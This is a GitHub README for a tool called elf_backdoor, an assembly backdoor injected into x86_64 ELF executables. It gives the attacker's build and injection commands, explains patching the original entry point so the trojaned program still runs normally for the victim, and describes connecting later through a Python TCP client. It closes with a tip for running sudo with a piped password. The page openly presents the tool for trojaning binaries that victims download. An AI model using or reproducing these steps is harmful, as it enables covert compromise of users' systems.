Skip to content

Latest commit

 

History

History
39 lines (33 loc) · 1.03 KB

README.md

File metadata and controls

39 lines (33 loc) · 1.03 KB

elf_backdoor

It is elf backdoor written in pure assembly language that works in x86_64

Usage

Attacker

First, in the backdoor/backdoor.s file,

you need to modify the statement push 0x4049a0 ; jump to entrypoint to the original entry point of the target binary.

backdoor

$ gcc elfinject.c -o elfinject -lelf
$ nasm -f bin backdoor.s -o backdoor.bin
$ ./elfinject elftarget backdoor.bin ".injected" 0x800000 0

backdoor_client

$ python3 tcpClient.py

victim

If the victim downloads or acquires the file in any manner.

$ ./elftarget

The victim successfully uses the original program without any issues, but later, attackers exploit backdoors.

Demo

backdoor

backdoor

backdoor_client

client

Tips

How to use sudo

$ python3 tcpClient
echo "password" | sudo -S <command>